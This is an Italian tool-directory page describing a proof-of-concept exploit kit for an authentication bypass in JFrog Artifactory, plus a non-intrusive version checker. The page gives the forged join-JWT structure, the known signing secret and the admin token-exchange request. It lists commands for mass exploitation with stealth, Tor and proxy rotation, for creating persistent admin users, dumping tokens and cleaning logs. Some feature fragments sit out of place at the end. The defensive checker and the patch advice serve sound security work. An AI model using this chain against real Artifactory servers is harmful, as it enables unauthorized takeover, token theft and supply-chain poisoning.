Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-82329-PoC-Exploit — Toolkit di exploit e rilevamento per CVE-2026-82329, un bypass di autenticazione di JFrog Artifactory. Falsifica i JWT di join per generare token admin; include un verificatore di versione non intrusivo. | Kitploit
Strumenti/GitHubGitHub/tc4dy/cve-2026-82329-poc-exploit
Strumenti DifensiviScanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebRaccolta InformazioniVirtualizzazione per la SicurezzaPenetration TestingAutenticazione

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Red Teaming
GitHubtc4dy/cve-2026-82329-poc-exploit

CVE-2026-82329-PoC-Exploit

Toolkit di exploit e rilevamento per CVE-2026-82329, un bypass di autenticazione di JFrog Artifactory. Falsifica i JWT di join per generare token admin; include un verificatore di versione non intrusivo.

Vedi Repository
11h 31m faNon ancora revisionato
Condividi

CVEPoC

CVE‑2026‑82329 – Toolkit per il bypass dell'autenticazione di JFrog Artifactory

Python 3.8+ CVSS Author Artifactory

SOLO USO ETICO – TEST DI SICUREZZA AUTORIZZATI
Questo repository fornisce strumenti esclusivamente per professionisti della sicurezza autorizzati, blue team e penetration tester.
L'accesso non autorizzato a sistemi informatici è illegale ai sensi del CFAA (USA), Computer Misuse Act (Regno Unito), TCK 243/244 (Turchia) e leggi simili in tutto il mondo.


📖 Panoramica della vulnerabilità

CVE‑2026‑82329 è una vulnerabilità critica di bypass dell'autenticazione in JFrog Artifactory self-hosted (versioni dalla 7.111.x alla 7.161.x) che consente a un attaccante non autenticato di ottenere un token di amministratore completo della piattaforma sfruttando il meccanismo di join del cluster JFrog Access.

Come funziona

  1. Fiducia nella join key vuota – JFrog Access si fida di una join key fantasma il cui valore è una stringa vuota. Il suo segreto di firma è quindi il valore deterministico 32 * 0x20 (spazi).
  2. JWT di join contraffatto – un attaccante contraffà un JWT HS256 firmato con questo segreto noto e kid = SHA256("").
  3. Token SERVICE emesso – POST /access/api/v1/registry/join restituisce un token SERVICE con scp=admin senza alcuna autenticazione.
  4. Scambio con token admin – POST /access/api/v1/tokens con scope=applied-permissions/admin&audience=* produce un token di amministratore completo della piattaforma.
  5. Impatto – takeover completo del repository, furto di token, creazione di utenti admin, avvelenamento degli artefatti, attacchi alla supply chain e movimento laterale verso servizi connessi (Xray, Mission Control, Distribution). Aggiornare immediatamente!

Versioni interessate

  • 7.111.4 – 7.111.20 – vulnerabile
  • 7.117.0 – 7.117.27 – vulnerabile
  • 7.125.0 – 7.125.19 – vulnerabile
  • 7.133.0 – 7.133.28 – vulnerabile
  • 7.146.0 – 7.146.36 – vulnerabile
  • 7.161.0 – 7.161.19 – vulnerabile

Patch

  • Aggiornare a 7.111.21, 7.117.28, 7.125.20, 7.133.29, 7.146.38 o 7.161.20 o versioni successive.
  • Se l'aggiornamento non è possibile, limitare l'accesso di rete ad Artifactory (non esporlo mai a Internet) e ruotare tutti i token admin come soluzione temporanea.

🧰 Strumenti

StrumentoScopoUtente previsto
exploit.pyToolkit completo weaponized con forgiatura JWT, scambio di token admin, creazione di utenti admin, scansione di massa, modalità stealth, rotazione proxy, menu interattivo e catena di attacco completa.Red team / pentester autorizzati
safechecker.pyVerificatore di vulnerabilità non intrusivo che rileva la versione di Artifactory, convalida l'esposizione e valuta il rischio senza ottenere alcun token o eseguire alcun payload. Genera report JSON.Blue team / revisori della sicurezza

📊 Confronto delle funzionalità

Funzionalitàexploit.pysafechecker.py
Rilevamento vulnerabilità✅✅
Rilevamento versione✅✅
JWT di join contraffatto✅❌
Emissione token di servizio✅❌
Scambio token admin✅❌
Creazione utente admin✅❌
Elenco repository✅❌
Elenco utenti✅❌
Dump configurazione✅❌
Dump token✅❌
Catena di attacco completa✅❌
Menu interattivo✅❌
Scansione di massa (multi‑thread)✅✅
Supporto proxy✅✅
Rotazione proxy✅❌
Supporto Tor (anonimato)✅❌
Rotazione User‑Agent (OPSEC)✅❌
Jitter (OPSEC)✅❌
Rate limiter adattivo✅❌
Modalità non intrusiva (sicura)❌✅
Report versione✅✅
Controllo accesso anonimo❌✅
Report JSON✅✅

🎯 Riepilogo dei casi d'uso

ScenarioStrumento consigliato
Blue Team – verificare se il proprio Artifactory è vulnerabilesafechecker.py
Audit di sicurezza – valutazione non intrusiva della vulnerabilitàsafechecker.py
Red Team – penetration testing autorizzato con sfruttamento completoexploit.py
Bug Bounty – test di divulgazione responsabilesafechecker.py
Scansione di massa – verifica di più target per la vulnerabilitàexploit.py (solo rilevamento)
Incident Response – verificare se i sistemi sono compromessisafechecker.py

⚙️ Installazione

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-82329-PoC-Exploit
cd CVE-2026-82329-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
curl_cffi

📋 Parametri

Parametri di exploit.py

ParametroDescrizione
-u, --urlURL di un singolo target Artifactory (es. http://artifactory.example.com:8082)
-f, --fileFile contenente l'elenco dei target (uno per riga) per la scansione di massa
--create-adminCrea un utente admin persistente (formato: USER:PASS)
--keep-adminMantiene l'utente admin creato (non esegue la pulizia dopo la scansione)
--token-onlyStampa solo il token admin (target singolo)
--interactiveMenu interattivo dopo lo sfruttamento
--service-idService ID per il JWT di join (predefinito: jfrt@01)
-t, --threadsNumero di thread per multi‑target (predefinito: 10)
--timeoutTimeout richiesta (predefinito: 25s)
--retryTentativi massimi (predefinito: 3)
--proxyProxy HTTP/HTTPS (es. http://127.0.0.1:8080)
--proxy-listFile con proxy per la rotazione (uno per riga)
--jitterJitter casuale (0‑2 sec) tra le richieste
--stealthAbilita la modalità stealth (rotazione UA + X‑Forwarded‑For)
--curl-cffiUsa curl_cffi per l'impersonificazione del fingerprint TLS
--fullAttacco completo: tutti i moduli
--dump-configDump della configurazione di sistema
--dump-tokensDump di tutti i token di accesso
--list-reposElenca i repository
--list-usersElenca gli utenti

Parametri di safechecker.py

ParametroDescrizione
-u, --urlURL di un singolo target Artifactory (es. http://artifactory.example.com:8082)
-f, --fileFile contenente l'elenco dei target (uno per riga)
-t, --threadsNumero di thread per multi‑target (predefinito: 5)
--timeoutTimeout richiesta (predefinito: 10s)
-v, --verboseOutput dettagliato
-o, --outputSalva il report JSON su file

💥 Scenari

#ScenarioComando
1Verifica rapida della vulnerabilitàpython safechecker.py -u http://artifactory.example.com:8082
2Scansione dettagliata con reportpython safechecker.py -u http://artifactory.example.com:8082 -o report.json -v
3Audit di massa da filepython safechecker.py -f targets.txt -t 10 -o audit.json
4Exploit solo rilevamentopython exploit.py -u http://artifactory.example.com:8082 --detect
5Ottenere solo il token adminpython exploit.py -u http://artifactory.example.com:8082 --token-only
6Attacco completo con menu interattivopython exploit.py -u http://artifactory.example.com:8082 --interactive
7Creare un utente admin persistentepython exploit.py -u http://artifactory.example.com:8082 --create-admin evil:P@ssw0rd1 --keep-admin
8Dump della configurazionepython exploit.py -u http://artifactory.example.com:8082 --dump-config
9Elenca repository e utentipython exploit.py -u http://artifactory.example.com:8082 --list-repos --list-users
10Exploit di massa con stealthpython exploit.py -f targets.txt -t 20 --stealth --jitter --full -o results.json
11Rotazione proxy con Torpython exploit.py -f targets.txt --proxy-list proxies.txt --curl-cffi --stealth

🧪 Endpoint e catena di sfruttamento

L'exploit utilizza i seguenti endpoint JFrog e passaggi di sfruttamento:

PassoMetodoEndpointDescrizione
1. JoinPOST/access/api/v1/registry/joinJWT HS256 contraffatto → token SERVICE (scp=admin)
2. ExchangePOST/access/api/v1/tokensToken SERVICE → token admin della piattaforma
3. ProveGET/artifactory/api/system/configurationProva di accesso solo admin
4. PersistPUT/artifactory/api/security/users/{user}Crea un utente admin persistente
5. RevokeDELETE/access/api/v1/tokens/{id}Pulizia dei token creati

Formato del payload

root@kitploit:~
# Forged join JWT structure
{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "iat": <unix_timestamp>,
  "service_id": "jfrt@01",
  "kid": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
  "skip_node_registration": true
}

# Signing secret
secret = b"\x20" * 32

# Admin token request
scope=applied-permissions/admin&audience=*&expires_in=0&refreshable=false

🛡️ Uso responsabile

  • Usare questi strumenti solo su sistemi di propria proprietà o per i quali si dispone di esplicita autorizzazione scritta al test.
  • L'accesso non autorizzato è illegale e non etico.
  • Gli autori non sono responsabili per qualsiasi uso improprio.
  • Rispettare sempre le leggi e i regolamenti del proprio paese.

Questo software è fornito solo a scopo didattico e per test di sicurezza autorizzati.

Scarica lo strumento
Pulizia log (anti‑forense)✅❌
User‑Agent personalizzato✅✅
Controllo verifica SSL✅✅
--detect
Solo rilevamento (nessuno scambio di token admin)
--exploitEsegue lo sfruttamento completo
-o, --outputSalva il report JSON su file
-v, --verboseOutput dettagliato
-q, --quietModalità silenziosa